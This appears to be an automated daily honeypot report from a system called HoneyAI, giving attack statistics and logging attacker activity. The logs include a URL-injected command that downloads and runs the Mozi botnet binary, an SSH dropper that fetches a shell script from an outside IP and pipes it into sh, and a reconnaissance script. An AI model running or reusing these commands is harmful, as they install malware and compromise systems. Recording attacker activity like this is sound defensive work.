๐Ÿ’€ critical

Daily Threat Report

423 SSH Connections
292 Login Attempts
131 Commands Run
42 SSH Unique IPs
14,586 Protocol Events
85 Protocol IPs
40 Web Hits
8 Web Service IPs
11 Reverse Scans
11 Scan Hits

Top Passwords Tried

  1. a665a45920422f9d
  2. 8c6976e5b5410415
  3. 4813494d137e1631
  4. 43fa32274a4c6df8

๐ŸŒ WEB HONEYPOT โ€” HoneyAI HTTP

AI-generated fake HTTP responses served to 40 scanner requests from 8 unique IPs (local, offline).

Top Paths Probed

  1. /SDK/webLanguage
  2. /cgi-bin/luci/;stok=/locale
  3. /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://59.103.119.7:54520/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
  4. /actuator/health
  5. /web-console/ServerInfo.jsp

Top User-Agents

  1. Mozilla/5.0
  2. Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
  3. Mozilla/5.0 zgrab/0.x
  4. Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36

๐Ÿ’ฅ OPERATION SPINE โ€” Reverse Port Scanning

Active defense back-profiling: HoneyAI executed **11** reverse port-scans against active attacker IPs. Out of these, **11** hosts were found with open services.

Discovered Open Ports on Attackers

๐ŸŒ64.62.197.48 Scanned at 01:09
๐ŸŒ64.62.197.50 Scanned at 02:02
๐ŸŒ64.89.163.166 Scanned at 02:49
๐ŸŒ45.205.1.70 Scanned at 03:48
๐ŸŒ64.89.163.79 Scanned at 04:41
๐ŸŒ64.89.163.178 Scanned at 06:36
๐ŸŒ64.89.163.77 Scanned at 08:15
๐ŸŒ64.89.163.91 Scanned at 08:26
๐ŸŒ64.89.163.180 Scanned at 10:12
๐ŸŒ64.89.163.144 Scanned at 16:41
๐ŸŒ151.243.11.37 Scanned at 17:35
# Automatic multi-platform threat intel reporting
$ honeypot-report.sh --since 24h
โ†’ 118 IPs โ†’ AbuseIPDB  (community confidence scores updated)
โ†’ 118 IPs โ†’ AlienVault OTX  (pulse indicators added)
โ†’ 118 IPs โ†’ Blocklist.de  (auto-ban list updated)
โ†’ 118 IPs โ†’ DShield/SANS  (global threat feed updated)

๐Ÿคฃ ATTACKER COMEDY CORNER

Real attempts. No actors were harmed in the making of this honeypot.

๐Ÿ”‘ Hall of Shame โ€” Passwords

a665a45920422f9d
8c6976e5b5410415
4813494d137e1631
43fa32274a4c6df8

๐Ÿ’ป Commands They Tried

/bin/./uname -s -v -n -r -m
uname -a; echo -e $_dq\x61\x75\x74\x68\x5F\x6F\x6B\x0A$_dq; cd /tmp || cd /var/tmp || cd /dev/shm; echo '-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACDveEt+JtIVZGBVIbVkHvdkvQqdMiafu5/IMOvelH/yxgAAAJAt8FDRLfBQ
0QAAAAtzc2gtZWQyNTUxOQAAACDveEt+JtIVZGBVIbVkHvdkvQqdMiafu5/IMOvelH/yxg
AAAEAr1wl+3JHkjA3ZtPtjd8bAtLVFo13eZ12Aw2QnFXC/ie94S34m0hVkYFUhtWQe92S9
Cp0yJp+7n8gw696Uf/LGAAAACGRsckBzZnRwAQIDBAU=
-----END OPENSSH PRIVATE KEY-----' > key.ppk; echo 'StrictHostKeyChecking no
UserKnownHostsFile /dev/null' > sshcfg; chmod 400 key.ppk; scp -F sshcfg -i key.ppk dlr@217.60.195.113:sh out_sh; if [ $? -eq 0 ]; then chmod +x out_sh; sh out_sh ssh >/dev/null 2>&1; else (wget --no-check-certificate -qO- https://217.60.195.113/sh || curl -sk https://217.60.195.113/sh) | sh -s ssh; fi; rm -rf sshcfg key.ppk out_sh
uname -a
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH
uname=$(uname -s -v -n -m 2>/dev/null)
arch=$(uname -m 2>/dev/null)
uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1)
cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c $_dq^processor$_dq /proc/cpuinfo 2>/dev/null) | head -1)
cpu_model=$( (grep -m1 -E $_dqmodel name|Hardware$_dq /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,$_dq$_dq,$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' )
gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50)
cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1)
ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1)
last_output=$(last 2>/dev/null | head -n 10)
echo $_dqUNAME:$uname$_dq
echo $_dqARCH:$arch$_dq
echo $_dqUPTIME:$uptime$_dq
echo $_dqCPUS:$cpus$_dq
echo $_dqCPU_MODEL:$cpu_model$_dq
echo $_dqGPU:$gpu_info$_dq
echo $_dqCAT_HELP:$cat_help$_dq
echo $_dqLS_HELP:$ls_help$_dq
echo $_dqLAST:$last_output$_dq
uname -s -m

These are real credentials and commands attempted by automated scanners and script kiddies. Logged, reported, and immortalized.

Automated report for 20 de junio de 2026. Recorded 423 SSH connections and 14586 multi-protocol decoy events on HoneyAI, from 127 unique IPs. 118 IPs were automatically reported to the AbuseIPDB community database.

SSH Activity (HoneyAI)

The SSH service received 292 login attempts from 42 unique IPs. Attackers executed 131 commands after gaining simulated system access.

Multi-Protocol Decoys (HoneyAI)

Detected 14586 events across services including FTP, Telnet, SMTP, MySQL, Redis, Git, VNC, and RDP from 85 distinct IPs. All events are access attempts against simulated production services.

HTTP Web Service (HoneyAI)

The web service received 40 HTTP requests from real scanners across 8 unique IPs. Each attacker received a fake response generated in real time by the local AI engine (Ollama, no internet connection required).

MCP Agent Trap

The MCP decoy server received 3 requests from 3 unique IPs. Attackers attempted to call internal tools including credential extraction and system command execution.

MSSQL / SNMP Honeypots

The MSSQL decoy received 0 authentication events from 0 IPs. The SNMP trap received 63 queries from 18 IPs probing community strings and OIDs.

Portscan Detection

Detected 0 incoming port scan events from 0 unique IPs.

AI Defense Stats

Blocked 0 prompt injection attempts and 0 identity leak attempts.

Active Defense (Operation Spine)

HoneyAI performed 11 reverse port scans back to active attacker IPs. Out of these, 11 hosts were found running open public services, allowing backfire profiling.

Network IDS (Suricata)

The network intrusion detection system generated 7051 alerts from 552 unique source IPs. Suricata monitors all traffic on the primary network interface using Emerging Threats + AlienVault OTX rulesets.

โ† All Reports ๐Ÿ›ก๏ธ Subscribe to blocklists โ†’